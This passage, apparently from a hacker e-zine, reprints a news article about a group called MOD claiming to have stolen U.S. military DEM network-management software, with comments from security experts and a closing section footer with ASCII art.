  1644.   The group, calling itself Masters of Downloading,
  1645.   or MOD, said in a statement that it had stolen the
  1646.   software -- the Defense Information Systems
  1647.   Network Equipment Manager (DEM) -- from the
  1648.   Defense Information Systems Agency, the branch
  1649.   of the Defense Department in charge of classified
  1650.   computer networks. 
  1651.  
  1652.   "This may help you to realize the reality of the
  1653.   threat of information warfare against the United
  1654.   States of America, as well as the DEM software's
  1655.   obvious value to certain global organizations and
  1656.   individuals," said the statement, which was
  1657.   supplied to Wired News by an anonymous
  1658.   representative of the group. 
  1659.  
  1660.   The statement detailed the capabilities of the DEM
  1661.   software, and was accompanied by a number of
  1662.   image files that depicted the program's interfaces.
  1663.   The software's authenticity was confirmed by John
  1664.   Vranesevich of the computer security site
  1665.   AntiOnline. Vranesevich said he obtained a copy
  1666.   from MOD last Thursday and tested it after first
  1667.   unplugging his computer from the Internet. 
  1668.  
  1669.   Vranesevich, who has tracked the computer
  1670.   underground for five years, said that the theft of a
  1671.   classified network control program pointed to a
  1672.   threat far more serious than the routine Web
  1673.   server intrusions of recent months. 
  1674.  
  1675.   "This is one of the first times we've seen a group of
  1676.   hackers whose goal was not to commit acts of
  1677.   Internet graffiti by defacing low-security Web
  1678.   pages, but [instead] to actually target, plan, and
  1679.   retrieve software suites designed for military use,"
  1680.   said Vranesevich. 
  1681.  
  1682.   Last month, Vranesevich was the first to interview
  1683.   Ehud Tenebaum, the Israeli teen at the center of a
  1684.   federal investigation into widespread attacks on
  1685.   US military computer systems. But those attacks
  1686.   pale in comparison, he says. 
  1687.  
  1688.   "[The deliberate theft of classified software] puts
  1689.   this group on a whole other playing field," said
  1690.   Vranesevich, who added that the group is
  1691.   comprised of 15 individuals, including eight
  1692.   Americans, five Britons, and two Russians. The
  1693.   group is not affiliated with Tenebaum, known as
  1694.   the Analyzer. 
  1695.  
  1696.   MOD said that the software is used to remotely
  1697.   monitor and manage military computer-related
  1698.   equipment, including routers, repeaters, switches,
  1699.   military communication networks, and GPS
  1700.   satellites and receivers. The suite's top-level
  1701.   interface is designed to "manage all the
  1702.   computer-related equipment used by the United
  1703.   States military," the statement read. 
  1704.  
  1705.   With the DEM software, the group claims, the
  1706.   entire Defense Information Systems Network could
  1707.   be shut down for a period of time. "This is
  1708.   definitely not a good thing for the United States
  1709.   military, as they depend heavily on their computer
  1710.   systems and networks to quickly share data and
  1711.   information from anywhere in the world," the
  1712.   statement said. 
  1713.  
  1714.   MOD went into detail over two particular software
  1715.   components, one of which allows a user with
  1716.   access to monitor or shut down T1 links used by
  1717.   the military. The other program concerns Global
  1718.   Positioning System satellites, which are used to
  1719.   establish precise coordinates for weapons
  1720.   targeting and the navigation of commercial aircraft.
  1721.  
  1722.   "Although the DEM software cannot be used to
  1723.   send data to the GPS satellites, it can be used to
  1724.   track the satellites and pinpoint their exact
  1725.   whereabouts, as well as the frequency ranges
  1726.   they use and other operational information," said
  1727.   the MOD statement. 
  1728.  
  1729.   MOD claims it first obtained the software in
  1730.   October 1997 but did nothing with it at first, to be
  1731.   sure that they were not being tracked. 
  1732.  
  1733.   Although the Defense Information Systems
  1734.   Agency public affairs office declined to comment,
  1735.   a mission statement on the agency's Web site
  1736.   clarifies its role within the Department of Defense:
  1737.   "DISA will be the preeminent provider of
  1738.   information systems delivery support to our
  1739.   warfighters and others as required by the DoD,
  1740.   under all conditions of Peace and War." 
  1741.  
  1742.   MOD members were not immediately available for
  1743.   comment, either, but in an interview with
  1744.   Vranesevich last Friday, group members said their
  1745.   intentions were not hostile. 
  1746.  
  1747.   "We have the power to do so, but at this time we
  1748.   have no intentions to launch such a [network]
  1749.   attack," a member told Vranesevich. Another
  1750.   member also told Vranesevich that he had
  1751.   obtained a separate piece of software used to
  1752.   communicate with submarines. 
  1753.  
  1754.   Gene Spafford, director of the Computer Security
  1755.   Research Center, COAST, said that the intrusion,
  1756.   if true, didn't surprise him. 
  1757.  
  1758.   "I don't think anyone who is familiar with
  1759.   government security has ever believed it to be as
  1760.   secure as claimed," Spafford said. 
  1761.  
  1762.   Spafford added that he was not familiar with DISA
  1763.   systems, but that any distributed system is
  1764.   vulnerable, and that many government systems
  1765.   are configured "for convenience and not need." 
  1766.  
  1767.   The group claimed that they stole the software
  1768.   from a Windows NT server at DISA, and that about
  1769.   30 individuals worldwide presently have copies. 
  1770.  
  1771.   "When you have a system that is distributed such
  1772.   that others can manipulate it, you open it up to not
  1773.   just security problems but also erroneous
  1774.   operations," Spafford said. "[You get] people who
  1775.   don't have training and [you get] accidents. It is a
  1776.   standard systems design question." 
  1777.  
  1778.   In an interview with Vranesevich, the group offered
  1779.   some network security advice for the US
  1780.   government. 
  1781.  
  1782.   "It's simple: take all [classified] military systems
  1783.   off the Internet, place only [unclassified] Web
  1784.   servers on the Internet [and] keep the rest on a
  1785.   purely internal network," the MOD member said. 
  1786.  
  1787. ───────────────────────────────────────────────────────────────────────────────
  1788. ===============================================================================
  1789. ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
  1790. ===============================================================================
  1791. ───────────────────────────────────────────────────────────────────────────────
  1792.  
  1793.  
  1794.                       _   /|  k0dek4t sez...
  1795.                       \'o O'                            
  1796.                       =(_o_)=   "EyEm HuNGaRy FoR SKiLLz,
  1797.                         U               nOt CaTf00d!!#@"
  1798.  
  1799.  
  1800. ───────────────────────────────────────────────────────────────────────────────
  1801. r00td0wn r00tsux r00tsick m00ksr00t fr00tl00ps r00tyt00ty vr00mvr00m r00tg0b00m
  1802. ───────────────────────────────────────────────────────────────────────────────
  1803.  
  1804.